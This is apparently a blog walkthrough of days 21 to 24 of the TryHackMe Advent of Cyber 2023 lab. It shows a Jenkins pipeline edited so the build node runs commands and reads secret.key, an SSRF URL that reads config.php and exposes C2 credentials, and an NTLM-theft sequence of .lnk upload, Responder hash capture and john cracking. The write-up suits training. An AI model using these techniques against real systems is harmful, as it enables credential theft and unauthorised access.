Question 7 – Detective Frosteau believes it was an account takeover based on the activity. However, Tracy might have left some crumbs.

Task 26 - [Day 20: DevSecOps] Advent of Frostlings

Task 27 – [Day 21: DevSecOps] Yule be Poisoned: A Pipeline of Insecure Code!

Question 1 – What Linux kernel version is the Jenkins node?

gift-wrapper-pipeline

git clone http://10.10.63.26:3000/McHoneyBell/gift-wrapper-pipeline.git

nano Jenkinsfile

pipeline {
    agent any

    stages {
        stage('Prepare') {
            steps {
                git 'http://127.0.0.1:3000/McHoneyBell/gift-wrapper.git'
            }
        }

        stage('Build') {
            steps {
                sh 'uname -a'
            }
        }
    }
}

Jenkinsfile

git add .
git commit -m "Test"
git push

git add .

git clone http://10.10.63.26:3000/McHoneyBell/gift-wrapper.git

cat Makerfile

cat to_pip.sh

gift-wrapper.git

nano Makerfile

uname -a

git add .
git commit -m "Kernel"
git push

git push

Jenkins Dashboard

gift-wrapper-pipeline

main

Console output

uname -a

Question 2 – What value is found from /var/lib/jenkins/secret.key?

nano Makerfile

secret.key

git add .
git commit -m "Secret"
git push

nano Makerfile

secret.key

Question 3 – Visit our Discord!

Task 27 - [Day 21: DevSecOps] Yule be Poisoned: A Pipeline of Insecure Code!

Task 28 – [Day 22: SSRF] Jingle Your SSRF Bells: A Merry Command & Control Hackventure

Question 1 – Is SSRF the process in which the attacker tricks the server into loading only external resources (yea/nay)?

Question 2 – What is the C2 version?

McGreedy C2

http://mcgreedysecretc2.thm/getClientData.php?url=file:////var/www/html/config.php

config.php

mcgreedy: mcgreedy!@#$%

Version 1.1

Question 3 – What is the username for accessing the C2 panel?

Command & Control Server

Question 4 – What is the flag value after accessing the C2 panel?

Flag

Question 5 – What is the flag value after stopping the data exfiltration from the McSkidy computer?

Hacked Users

Agent removal

Agent Removed

Question 6 – If you enjoyed this task, feel free to check out the SSRF room.

Task 28 - [Day 22: SSRF] Jingle Your SSRF Bells: A Merry Command & Control Hackventure

Task 29 – [Day 23: Coerced Authentication] Relay All the Way

Question 1 – What is the name of the AD authentication protocol that makes use of tickets?

Question 2 – What is the name of the AD authentication protocol that makes use of the NTLM hash?

Question 3 – What is the name of the tool that can intercept these authentication challenges?

Question 4 – What is the password that McGreedy set for the Administrator account?

cd /root/Rooms/AoC2023/Day23/ntlm_theft/

python3 ntlm_theft.py -g lnk -s 10.10.95.108 -f stealthy

ntlm_theft.py

cd stealthy/

root@ip-10-10-95-108:~/Rooms/AoC2023/Day23/ntlm_theft/stealthy# smbclient //10.10.151.231/ElfShare/ -U guest%
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> put stealthy.lnk 
putting file stealthy.lnk as \stealthy.lnk (105.7 kb/s) (average 105.7 kb/s)
smb: \> dir
  .                                   D        0  Sun Dec 24 15:40:27 2023
  ..                                  D        0  Sun Dec 24 15:40:27 2023
  EXCO                                D        0  Wed Nov 22 11:07:20 2023
  greedykeys.txt                      A     2446  Thu Nov 23 17:50:09 2023
  HR                                  D        0  Wed Nov 22 11:06:57 2023
  IT                                  D        0  Wed Nov 22 11:07:02 2023
  SALES                               D        0  Wed Nov 22 11:07:05 2023
  stealthy.lnk                        A     2164  Sun Dec 24 15:40:27 2023
  SUPPORT 

smbclient Elfshare

responder -I ens5

Responder setup

Administrator hash

Administrator::ELFHQSERVER:871ce18588fdc631:68D7039B683632278BB51397F2266D7A:010100000000000000B4A1957F36DA01AC86F3E056200E6600000000020008005500330050004D0001001E00570049004E002D005600300048003800540057003700490038005A00420004003400570049004E002D005600300048003800540057003700490038005A0042002E005500330050004D002E004C004F00430041004C00030014005500330050004D002E004C004F00430041004C00050014005500330050004D002E004C004F00430041004C000700080000B4A1957F36DA0106000400020000000800300030000000000000000000000000300000BFE4FB2E8A189690B18DA31D8BC34A50DAFDD45CCBF5C0DC044B37C02320A1BF0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00390035002E003100300038000000000000000000

john --wordlist=greedykeys.txt hash.txt

John Cracking

Question 5 – What is the value of the flag that is placed on the Administrator’s desktop?

Flag

Question 6 – If you enjoyed this task, feel free to check out the Compromising Active Directory module!

Task 29 - [Day 23: Coerced Authentication] Relay All the Way

Task 30 – [Day 24: Mobile Analysis] You Are on the Naughty List, McGreedy

Question 1 – One of the photos contains a flag. What is it?

Tracy McGreedy

Android-McGreddy.img_1 Host

Image listing

Flag

Question 2 – What name does Tracy use to save Detective Frost-eau’s phone number?

Detective Frost-eau’s phone number

Question 3 – One SMS exchanged with Van Sprinkles contains a password. What is it?

Mcgreddy SMS

Question 4 – If you have enjoyed this room please check out the Autopsy room.

Task 30 - [Day 24: Mobile Analysis] You Are on the Naughty List, McGreedy

Task 31 – [Day 24: The Confrontation] Jolly Judgment Day

Question 1 – What is the final flag?

Question 1

Evidence accepted

Information from ChatBot

Question 2

Forum Post

Question 3

Dropped USB

Question 4

Server Takeover Password

Question 5

C2 Server Creds

Question 6

Forensic Image of McGreddy's Phone

Flag

Task 31 - [Day 24: The Confrontation] Jolly Judgment Day

Task 32 [Day 24: The End] We the Kings of Cyber Are

Question 1 – Congratulations on finishing Advent of Cyber 2023! Only one thing left…

Task 32 [Day 24: The End] We the Kings of Cyber Are

Task 33 – [Day 24: Feedback] We wish you a Merry Survey

Question 1 – What flag did you get after completing the survey?

The Flag

Task 33 - [Day 24: Feedback] We wish you a Merry Survey

Also Read: DVWA – Stored Cross Site Scripting (Low/Med/High)

So that was “Advent of Cyber 2023” for you. We looked into various challenges on topics like Machine Learning, Password Bruteforcing, Log Analysis, Reverse Engineering, Active Directory, Incident Response, Digital Forensics and much more. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top